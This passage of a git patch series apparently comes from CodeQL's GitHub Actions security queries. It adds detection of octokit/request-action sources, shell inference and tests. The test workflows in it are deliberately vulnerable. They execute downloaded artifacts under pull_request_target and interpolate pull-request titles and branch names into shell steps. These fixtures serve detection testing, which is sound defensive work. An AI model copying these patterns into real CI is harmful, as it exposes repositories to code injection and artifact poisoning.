ql/src/Models/CompositeActionsSinks.ql diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Models/CompositeActionsSources.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSources.ql rename to ql/src/Models/CompositeActionsSources.ql diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Models/CompositeActionsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSummaries.ql rename to ql/src/Models/CompositeActionsSummaries.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Models/ReusableWorkflowsSinks.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql rename to ql/src/Models/ReusableWorkflowsSinks.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Models/ReusableWorkflowsSources.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSources.ql rename to ql/src/Models/ReusableWorkflowsSources.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Models/ReusableWorkflowsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql rename to ql/src/Models/ReusableWorkflowsSummaries.ql diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql index 2000e2100aef..9c9c2e4d139a 100644 --- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.OutputClobberingQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import OutputClobberingFlow::PathGraph import codeql.actions.security.ControlChecks diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 54e013f1091d..7d8a3b490091 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvPathInjectionQuery import EnvPathInjectionFlow::PathGraph +import codeql.actions.dataflow.FlowSources import codeql.actions.security.ControlChecks from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink, Event event diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index 7ca8f4a28382..a1499764ef36 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.EnvPathInjectionQuery +import codeql.actions.dataflow.FlowSources import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index ad97dd3caefd..540edfd8b5f9 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import EnvVarInjectionFlow::PathGraph import codeql.actions.security.ControlChecks diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 70c05fc1c95d..c9af38a2c507 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink diff --git a/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/ql/test/query-tests/Models/CompositeActionsSinks.qlref index f8e1bfca630d..e5cb225ed249 100644 --- a/ql/test/query-tests/Models/CompositeActionsSinks.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -1 +1 @@ -Security/CWE-020/CompositeActionsSinks.ql +Models/CompositeActionsSinks.ql diff --git a/ql/test/query-tests/Models/CompositeActionsSources.qlref b/ql/test/query-tests/Models/CompositeActionsSources.qlref index dce31c319238..3b833d669125 100644 --- a/ql/test/query-tests/Models/CompositeActionsSources.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/CompositeActionsSources.ql +Models/CompositeActionsSources.ql diff --git a/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref index 007941cd2f5b..ea9b7a304e6b 100644 --- a/ql/test/query-tests/Models/CompositeActionsSummaries.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/CompositeActionsSummaries.ql +Models/CompositeActionsSummaries.ql diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref index 369befbce628..fa8344d4bf91 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSinks.ql +Models/ReusableWorkflowsSinks.ql diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref index cbea721ee343..fe4299bdba49 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSources.ql +Models/ReusableWorkflowsSources.ql diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref index ff87d53c3d69..3547c8a4d07d 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSummaries.ql +Models/ReusableWorkflowsSummaries.ql diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml new file mode 100644 index 000000000000..7eaee9fa6d38 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml @@ -0,0 +1,19 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + - id: pr_number + run: | + PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 7a59ab6ec60d..5c784595dbec 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -13,6 +13,7 @@ edges | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -41,6 +42,8 @@ nodes | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -57,3 +60,4 @@ subpaths | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 2ed89bcb4bc5..e6108dddd2a5 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -13,6 +13,7 @@ edges | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -41,5 +42,7 @@ nodes | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 6d56b99407e0..d05c7bebc07e 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -3,6 +3,7 @@ | .github/workflows/artifactpoisoning21.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning71.yml:10:15:10:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning101.yml:11:15:11:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:94:15:94:39 | codecov/codecov-action@v3 | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:111:15:111:48 | peter-evans/create-pull-request@v5 | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:127:15:127:56 | thollander/actions-comment-pull-request@v2 | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 6a629764adc7..2a401dee18ae 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -53,6 +53,7 @@ edges | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:16:9:19:59 | Run Step: pr_number | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 09f1fd1a81814dd55d84f15134f302a82c6cbc34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 11:48:19 +0200 Subject: [PATCH 589/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 82891e5c0173..12cf4c6106a4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.67 +version: 0.1.68 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fb4416ffb1d6..b10da74b7118 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.67 +version: 0.1.68 groups: [actions, queries] suites: codeql-suites extractor: javascript From b072cfa1f7ee9959ad3423926850fadf44d98a66 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 10:40:33 +0200 Subject: [PATCH 590/707] Add pwsh as the default shell for windows runners --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 ++++++-- .../library-tests/.github/workflows/shell.yml | 23 +++++++++++++++++++ 2 files changed, 31 insertions(+), 2 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/shell.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7c433a39e620..67ef99e0fc87 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1438,12 +1438,18 @@ class RunImpl extends StepImpl { /** Gets the shell for this `run` mapping. */ string getShell() { - if exists(n.lookup("shell").(YamlString).getValue()) + if exists(n.lookup("shell")) then result = n.lookup("shell").(YamlString).getValue() else if exists(this.getInScopeDefaultValue("run", "shell")) then result = this.getInScopeDefaultValue("run", "shell").getValue() - else result = "bash" + else + if this.getEnclosingJob().getARunsOnLabel().matches(["ubuntu%", "macos%"]) + then result = "bash" + else + if this.getEnclosingJob().getARunsOnLabel().matches("windows%") + then result = "pwsh" + else result = "bash" } ShellScriptImpl getScript() { result = scriptScalar } diff --git a/ql/test/library-tests/.github/workflows/shell.yml b/ql/test/library-tests/.github/workflows/shell.yml new file mode 100644 index 000000000000..9392b81c6ab2 --- /dev/null +++ b/ql/test/library-tests/.github/workflows/shell.yml @@ -0,0 +1,23 @@ +on: push + +jobs: + job1: + runs-on: ubuntu-latest + steps: + - shell: pwsh + run: Write-Output "foo" + job2: + runs-on: ubuntu-latest + steps: + - run: echo "foo" + + job3: + runs-on: windows-latest + steps: + - shell: bash + run: echo "foo" + job4: + runs-on: windows-latest + steps: + - run: Write-Output "foo" + From 6bf3eb79a9aa809bc38ead6ccf3687aaab4bdae3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 10:44:43 +0200 Subject: [PATCH 591/707] Add sh as a bash-compatible POSIX shell --- ql/lib/codeql/actions/Bash.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 672f7727f5b5..c1e038069eb1 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -4,7 +4,7 @@ class BashShellScript extends ShellScript { BashShellScript() { exists(Run run | this = run.getScript() and - run.getShell().matches("bash%") + run.getShell().matches(["bash%", "sh"]) ) } From a1047d155c1d23668072a301aecad629574e3d74 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 14:48:53 +0200 Subject: [PATCH 592/707] Add new control checks using octokit/request-action --- ql/lib/codeql/actions/security/ControlChecks.qll | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 3b15fc78d10a..760efaf5e7e6 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -256,6 +256,9 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { or this.getCallee() = "actions/github-script" and this.getArgument("script").splitAt("\n").matches("%getMembershipForUserInOrg%") + or + this.getCallee() = "octokit/request-action" and + this.getArgument("route").regexpMatch("GET.*(memberships).*") } } @@ -279,6 +282,9 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { or this.getCallee() = "actions/github-script" and this.getArgument("script").splitAt("\n").matches("%getCollaboratorPermissionLevel%") + or + this.getCallee() = "octokit/request-action" and + this.getArgument("route").regexpMatch("GET.*(collaborators|permission).*") } } From 8323819504571d2fbfa1c83680009268f6dccafa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 15:51:00 +0200 Subject: [PATCH 593/707] New sources for octokit/request-action --- .../codeql/actions/dataflow/FlowSources.qll | 21 ++++++ ql/lib/codeql/actions/dataflow/TaintSteps.qll | 36 ++++++++- .../CWE-094/.github/workflows/test17.yml | 74 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 16 ++++ .../CWE-094/CodeInjectionMedium.expected | 12 +++ 5 files changed, 158 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index a9967a72ee6e..b79a86ce27ac 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -295,3 +295,24 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { override string getSourceType() { result = "text" } } + +class OctokitRequestActionSource extends RemoteFlowSource { + OctokitRequestActionSource() { + exists(UsesStep u, string route | + u.getCallee() = "octokit/request-action" and + route = u.getArgument("route").trim() and + route.indexOf("GET") = 0 and + ( + route.matches("%/commits%") or + route.matches("%/comments%") or + route.matches("%/pulls%") or + route.matches("%/issues%") or + route.matches("%/users%") or + route.matches("%github.event.issue.pull_request.url%") + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } +} diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll index e9d5a44c929a..80858df909b6 100644 --- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -91,11 +91,45 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node ) } +/** + * A read of user-controlled field of the octokit/request-action action. + */ +predicate octokitRequestActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof OctokitRequestActionSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + succ.asExpr() = o and + ( + not o instanceof JsonReferenceExpression and + o.getFieldName() = "data" + or + o instanceof JsonReferenceExpression and + o.(JsonReferenceExpression).getInnerExpression().matches("%.data") and + o.(JsonReferenceExpression) + .getAccessPath() + .matches([ + "%.title", + "%.user.login", + "%.body", + "%.head.ref", + "%.head.repo.full_name", + "%.commit.author.email", + "%.commit.commiter.email", + "%.commit.message", + "%.email", + "%.name", + ]) + ) + ) +} + class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { dornyPathsFilterTaintStep(node1, node2) or tjActionsChangedFilesTaintStep(node1, node2) or tjActionsVerifyChangedFilesTaintStep(node1, node2) or - xt0rtedSlashCommandActionTaintStep(node1, node2) + xt0rtedSlashCommandActionTaintStep(node1, node2) or + octokitRequestActionTaintStep(node1, node2) } } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml new file mode 100644 index 000000000000..559c69c4710f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml @@ -0,0 +1,74 @@ +name: Test + +on: + issue_comment: + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + runs-on: ubuntu-latest + steps: + - name: Get PR details + id: get-pr + if: github.event_name == 'issue_comment' + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Set PR source branch as env variable + if: github.event_name == 'issue_comment' + run: | + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') + echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV + setup2: + runs-on: ubuntu-latest + steps: + - name: Get PR details + uses: octokit/request-action@v2.x + id: get-pr-details + with: + route: GET /repos/{repository}/pulls/{pull_number} + repository: ${{ github.repository }} + pull_number: ${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} + - name: Set environment variables + run: | + MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} + if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." >> $GITHUB_ENV; fi + echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV + echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV + setup3: + runs-on: ubuntu-latest + steps: + - id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} + - run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + setup4: + runs-on: ubuntu-latest + steps: + - id: get-pull-request + uses: octokit/request-action@v2.x + with: + route: GET /repos/{owner}/{repo}/pulls/{pull_number} + owner: foo + repo: bar + pull_number: ${{ github.event.issue.number }} + + - run: >- + echo "Pull request title is \"${{ + fromJson(steps.get-pull-request.outputs.data).title }}\" but expected + \"Updated test pull request\"" && exit 1 + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 699d53da9cc1..1ad0d4987917 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -155,6 +155,10 @@ edges | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | 